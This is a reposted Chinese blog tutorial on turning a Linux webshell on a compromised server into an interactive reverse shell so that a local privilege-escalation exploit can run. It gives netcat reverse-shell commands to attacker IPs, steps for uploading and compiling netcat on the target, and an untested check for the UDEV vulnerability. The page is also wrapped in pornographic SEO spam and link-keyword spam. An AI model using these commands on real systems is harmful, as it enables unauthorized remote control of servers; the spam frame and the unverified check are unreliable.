成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux下通過WebShell反彈CmdLine Shell小技巧

安全 網(wǎng)站安全
(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一個寫版權(quán)的)昨晚(應(yīng)該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權(quán)呢,最后發(fā)現(xiàn)服務(wù)器貌似已經(jīng)打過補丁了。不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。
(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一個寫版權(quán)的)

昨晚(應(yīng)該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權(quán)呢,最后發(fā)現(xiàn)服務(wù)器貌似已經(jīng)打過補丁了。
不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。

Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒法利用到。所以我們需要先反彈一個CmdLine Shell回來(直接說成CmdShell怕人誤解...因為Win有個cmd.exe ^_^),然后在命令行終端下執(zhí)行EXP進行提權(quán)。

一般情況下,絕大多數(shù)人都會通過PHP WebShell的Back Connect功能彈回一個Shell,但是有時候會碰到服務(wù)器不支持PHP或者WebShell沒法反彈的情況,比如這兩天朋友給我的一個JSPShell所在服務(wù)器只支持JSP,不支持PHP。這時候,我們經(jīng)典的netcat就可以派上用場了。

平時在Windows下做事的時候,在必要的情況下我們可以先在本機運行nc -vv -lp 1234監(jiān)聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個CmdShell,這個方法在Linux仍然可行。

在本機監(jiān)聽后,在WebShell運行nc 12.21.12.21 1234 -e /bin/sh就能彈一個CmdLine Shell給我們。
但我們經(jīng)常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺,每臺都是不能直接執(zhí)行nc的。一臺有nc,但執(zhí)行從是不起作用,另外一臺直接壓根就沒有nc....

不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結(jié)果仍然不能運行....)。如果還不行,那就把源碼傳上去,在目標機器上直接編譯。

昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標機器上編譯的。如果直接傳的nc可以運行的話還比較好說,如果需要在目標機器上編譯的話,這里有點小技巧:
因為在得到CmdLine Shell前,我們只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執(zhí)行命令默認的當前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時候,configure還好說,可用/tmp/netcatsrc/configure命令,但下一步make的時候就不行了,因為當前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時候會報錯。

解決這個問題其實也很簡單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make
用分號隔開寫,把make跟在目錄切換命令后面,這樣編譯的時候就不會報錯了。(流浪貓教的..^_^)
在還沒有得到CmdLine Shell的時候,這樣的寫法還是很有用的。

編譯成功以后,我們就可以輸入命令反彈Shell了(比如我這里nc路徑是/tmp/nc):
本地nc -vv -lp 80后
/tmp/nc 202.xx.xx.250 80 -e /bin/sh就可以給我嗎彈回來一個CmdLine Shell。

效果如下圖:


----------------

要注意反彈的Linux Shell是沒有$提示符的哦,執(zhí)行一句返回一句。
還有一點就是這里反彈Shell的時候我運行的是/bin/sh,當然運行/bin/bash也可以。
不過我覺得最好還是運行/bin/sh吧,因為/bin/sh的權(quán)限比/bin/bash放的更開一些

順便說一下怎么判斷目標是否有UDEV這個漏洞。
Linux我還不知道怎么樣查看它是否打過這個補丁,所以我想了個比較簡單的辦法:

1.執(zhí)行cat /proc/net/netlink,記錄下PID A
2.執(zhí)行ps aux | grep udev ,記下root的PID B
3.如果A = B - 1,則存在漏洞,否則不存在
這是我自己想的,因為獲得PID的時候有這兩種方法,所以我通過他們對比來判斷,但我并不能確定我這方法是100%正確的,僅供參考。
效果如下圖:
在反彈的Shell里執(zhí)行,發(fā)現(xiàn)得到的PID不一樣,2487 != 1230

在我自己機器上,PID一樣,1184=1185-1


責任編輯:Oo小孩兒 來源: 零魂's Blog
相關(guān)推薦

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2010-11-02 21:17:17

2018-06-18 10:33:39

Linux內(nèi)網(wǎng)技巧

2015-03-06 15:43:39

2019-12-04 12:28:24

TOP命令Linux

2017-09-04 16:20:38

Linuxshell命令

2021-12-16 10:53:23

shell命令腳本

2020-03-18 14:20:25

shellLinux命令

2011-02-25 14:10:52

Proftpd技巧

2009-10-23 08:41:14

Linux系統(tǒng)操作系統(tǒng)Grub

2010-09-26 16:46:05

2013-12-02 09:49:59

2022-11-29 10:42:46

GoFrame技巧腳手架

2011-05-27 10:02:42

Shell

2021-06-07 23:51:16

MacGo服務(wù)

2015-03-09 10:22:23

2009-07-15 09:09:45

Vim編輯器使用Vim備份

2009-06-19 13:32:40

Java開啟OpenGL

2013-11-15 14:23:28

Ubuntu技巧

2013-11-11 17:31:34

Ubuntu技巧
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 韩国av网站在线观看 | 一级国产精品一级国产精品片 | 国产成人福利在线观看 | 免费黄色的视频 | 三级免费av | 91久久伊人 | 亚洲精品在线91 | 欧美日韩免费一区二区三区 | 久久这里有精品 | 丁香综合 | 欧美一卡二卡在线观看 | 一区二区三区视频在线 | 好姑娘高清在线观看电影 | 黄网站涩免费蜜桃网站 | 久久99精品视频 | 拍拍无遮挡人做人爱视频免费观看 | 中文字幕一区二区三区四区五区 | 久色网 | 中文字幕一区在线观看视频 | 亚洲欧美日韩国产综合 | 久久久av | 成人高潮片免费视频欧美 | 国产精品极品美女在线观看免费 | 欧美日韩国产一区二区三区 | 亚洲日韩视频 | 国产精品视频一区二区三区不卡 | 亚洲免费观看视频 | 九九热这里 | 亚洲成人一区二区 | 日韩精品一区二区三区老鸭窝 | 欧美一区二区三区大片 | 男女网站免费观看 | 北条麻妃视频在线观看 | 成人精品一区二区三区中文字幕 | 国产96在线 | 一级a性色生活片久久毛片波多野 | 欧美日韩不卡 | 日韩国产专区 | 色婷婷久久久亚洲一区二区三区 | 中文字幕一区在线观看视频 | 日韩免费三级 |